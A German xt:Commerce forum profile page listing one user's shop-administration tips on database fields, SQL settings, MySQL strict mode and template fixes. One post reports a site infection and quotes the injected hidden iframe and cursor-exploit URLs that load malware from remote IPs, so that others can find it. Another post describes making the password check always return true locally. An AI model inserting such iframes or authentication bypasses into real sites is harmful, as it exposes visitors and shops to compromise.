Jump to content
xt:Commerce Community Forum

franc

Members
  • Content Count

    38
  • Joined

  • Last visited

  1. franc

    produktbilder

    Die einzige wirklich gute Lösung ist nach wie vor xtcmodified! Ganz ohne Frage. xtc:Commerce ist definitiv eine Sackgasse und für einen professionellen Shop völlig indiskutabel.
  2. Das freut mich Grüße zurück! Bei weiteren Fragen/Problemen, einfach melden. :franc
  3. Kommst du überhaupt auf die Datenbank drauf? Mit z.B. phpmyadmin oder so? Wenn ja, dann schnapp dir die tabelle "products" und dort das Feld "nc_ultra_shipping_costs" (Struktur der DB anzeigen), das bearbeitest du und trägst bei "Länge/Set" ein: 8,4 Wenn du kein phpmyadmin o.ä. hast dann wird es etwas schwieriger, dann musst du dir ein Skript basteln, das dieses Feld anpasst...
  4. Das liegt am zu sparsamen Datentyp DECIMAL(6,4) für nc_ultra_shipping_costs. Du musst den in der Datenbank erweitern, zum Beispiel auf DECIMAL(8,4). Oder gleich beim Installieren in der install-gambioultra.php: ALTER TABLE `products` ADD `nc_ultra_shipping_costs` DECIMAL(8,4) DEFAULT '0' NOT NULL Gruß franc
  5. Hab das Problem wieder mal gehabt. Diesmal war es eine Abweichung der Pfade in der config mit den Einstellungen im apache. Die config verwies auf ein anderes Verzeichnis als das im apache eingestellte Webverzeichnis. Eigentlich aber einfach: die Fehlermeldung war nämlich eindeutig, wenn man sie nur genau liest, da standen nämlich die zwei verschiedenen Pfade schon drin. wlkikiv
  6. Hallo, wo wende ich mich hin, wenn ich für meinen xt:commerce Shop eine Erweiterung programmiert haben möchte? Ich suche eine Job-Börse für xt-commerce auf Freelancer-Basis. Das gibt es z.B. für Joomla ja auch: http://joomlajobs.de/index.php Gruß franc
  7. Falls dein Problem noch akut ist, du hast xtc offensichtlich auf Windows laufen (mit xampp). Geh in die Datenbank deines Shops (z.B. mit phpMyAdmin) und passe den Temp-Pfad Parameter an: UPDATE configuration SET configuration_value = 'Dein_absoluter_pfad_zum_Temp_Verzeichnis' WHERE configuration_key = 'SESSION_WRITE_DIRECTORY' Auf Windows-Systemen also z.B.: UPDATE configuration SET configuration_value = 'C:\Temp' WHERE configuration_key = 'SESSION_WRITE_DIRECTORY' Der Standard ist /tmp das ist für Unix-Systeme (erkennbar am Slash, Windows hat Backslash)
  8. Oder z.B. in der zur MySQL-Instanz gehörigen my.ini unter sql-mode das STRICT_TRANS_TABLES, entfernen, also dass es so aussieht: # Set the SQL mode to strict sql-mode="NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION" MySQL-Server-Dienst neustarten, dann gehts. Dass xtc diesen Strikt-Mode nicht kann, liegt natürlich nicht an schlechtem Code sondern an uraltem (nie überarbeitetem) Code ;-) Gruß, franc
  9. hallo, auch auf unserm server war plötzlich dieser virus. es ist der 'ms07-017' der nützt auf windows systemen einen bug seit dez.06 (erst im april 07 mit update bugfixed) sog. ani-lücke, hat was mit cursor zu tun, im schadcode steht dann: ... style=\"CURSOR: url('http://81.95.149.27/eur/ms07-017.ani' ... und den schadcode holt sich der virus von russischen servern die mit 81.95. anfangen. in meinem fall war jeweils in den dateien admin\index.php cache\index.html export\index.html index.php login.php templates_c\index.html <iframe src='http://81.95.145.240/go.php?sid=1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe> angehängt. antivir hat das bemängelt, wenn man die seite im IE öffnete (nicht betroffen der FF). War etwas umständlich den zu finden, weil er sich ja erst bei seitenaufruf lädt und durch einfaches durchsuchen nach ms17-17 nicht zu finden ist (wohl aber durch textsuche nach 81.95.). wie diese dateien veraendert werden konnten ist mir noch nicht klar, die ftp-logfiles muessen noch geprueft werden (sofern vorhanden, kein direkter serverzugriff). vielleicht ja aber durch eine luecke in xtcommerce oder php??? wenn ich mehr weiss werde ich es hier posten. gruss franc
  10. Was mich schon ein paar mal ziemlich gestört hat ist folgendes: ich bin im Administrationsbereich und bearbeite irgendwas. Ohne aber daran zu denken, dass ich schon eine Weile nicht abgeschickt habe und wenn ich dann auf Speichern drücke komme ich wieder ins Login und alles ist fort. Eine Möglichkeit dem vorzubeugen ist z.B. in Firefox einen Tab zu schützen und zu sperren, dem auch alle 10 min. ein automatisches Neuladen zu verpassen. Dies geht mit dem Addon 'Tab Mix Plus'. Wenn man dann eigeloggt ist, wird mit dem (ansonsten unnützen) Tab immer rechtzeitig die Session wieder auf 0 gesetzt (glaub nach ca. 20 min. läuft das auf unserm Server ab, darauf hab ich aber keinen Einfluss). Lokal hab ich natürlich die session-halbwertszeit (in der php.ini, session.gc_maxlifetime = 360000) auf 10 Lichtjahre (in Zeit umgerechnet) gesetzt :-) Und in xtc_validate_password.inc.php die funktion xtc_validate_password noch vor dem ersten if mit return true; abgekürzt, damit ich nicht jedes mal ein richtiges passwort eingeben muss...
  11. Hm, stimmt eigentlich, irgendwas hab ich da wohl vertrudelt, sorry. Ich hab an diesem xtc schon an diversen stellen rumgeschraubt, dass ich gar nicht mehr genau weiss was da jetzt dahintersteckt. na egal.
  12. Also bei mir war dieser Fehler mal aufgetaucht, als ich das yaml für xtc template eingebunden hatte. dort muss man nämlich auch die header.php aus include austauschen, und dort drin ist das inc verzeichnis hartcodiert, also statt richtigerweise require_once (DIR_FS_INC.'xtc_image.inc.php'); steht dort require_once (inc/xtc_image.inc.php'); hab nicht weiter geforscht, sondern einfach diese inc durch DIR_FS_INC ersetzt dann gings wieder. ...und natürlich die anderen require_once anweisungen auch angepasst, also insgesamt, ab Zeile 292: // include needed functions require_once(DIR_FS_INC.'xtc_output_warning.inc.php'); require_once(DIR_FS_INC.'xtc_image.inc.php'); require_once(DIR_FS_INC.'xtc_parse_input_field_data.inc.php'); require_once(DIR_FS_INC.'xtc_draw_separator.inc.php'); [/PHP]
  13. Hallo van-delle, mail mir mal: [email protected] Betreff: xt-commerce (betreff, damit der filter es durchlässt :-)
  14. Hallo, falls es jemand interessiert, es gibt im Admin Bereich unter Konfiguration / Versand Optionen / Versandkosten in Produktinfos -> die (theoretische) Möglichkeit diese NICHT anzuzeigen, wenn man auf "false" stellt. Dies geht aber erst, wenn man eine kleine Korrektur in includes\classes\main.php in zeile 50 vornimmt. Man setzt dort vor die Zeile return ' '.SHIPPING_EXCL.'<script language="javasc.... blablabla[/PHP] ein "if (SHOW_SHIPPING == 'true')" also: [PHP]if (SHOW_SHIPPING == 'true') return ' '.SHIPPING_EXCL.'<script language="javasc.... blablabla[/PHP] dann wird geprüft, ob der Link auch wie oben erklärt eingestellt, auch benutzt werden soll. Ich weiss nicht warum das fehlt, aber es hat mich mind. eine Stunde Sucherei und etwas Ärger gekostet, das zu finden. Diese Zeile wird übrigens auch vom grossen Validator bemängelt wg. fehlendem CDATA in JavaScript. Das kann man mit (also alles in allem): [PHP]if (SHOW_SHIPPING == 'true') return ' '.SHIPPING_EXCL.'<script language="JavaScript" type="text/javascript">/* <![CDATA[ */document.write(\'<div><a href="javascript:newWin=void(window.open(\\\''.xtc_href_link(FILENAME_POPUP_CONTENT, 'coID='.SHIPPING_INFOS).'\\\', \\\'popup\\\', \\\'toolbar=0, scrollbars=yes, resizable=yes, height=400, width=400\\\'))">'.SHIPPING_COSTS.'</div></a>\');/* ]]> */</script><noscript><a href="'.xtc_href_link(FILENAME_POPUP_CONTENT, 'coID='.SHIPPING_INFOS).'" target="_blank">'.SHIPPING_COSTS.'</a></noscript>';[/PHP]
  15. Hallo sugar, entschuldigung, ich war eine weile nicht mehr auf diesem forum... kann es vielleicht sein, dass deine kategorien auf englisch gespeichert werden? versuch mal testweise englisch zu deinstallieren und nur deutsch zu lassen und mach dann nochmal einen ex/import. Wenn ich eine csv-datei importieren will reicht sogar schon: XTSOL p_model XTSOL 10.04.01 Das sind die absoluten Pflichtfelder. Ohne Anführungszeichen und getrennt durch TAB. Dann sieht man das Produkt natürlich nicht, weil die kategorie fehlt aber z.b. XTSOL p_model p_cat.0 XTSOL 12345 neue_kategorie zeigt es schon. Ich mach das aber nicht mit Excel, sondern mit einem Texteditor oder evtl mit OpenOffice. Wenn du willst, kann ich dir eine kleine Import-Anleitung mailen, wo alles drin steht (s. xt-commerce-forum-postfach).
×
×
  • Create New...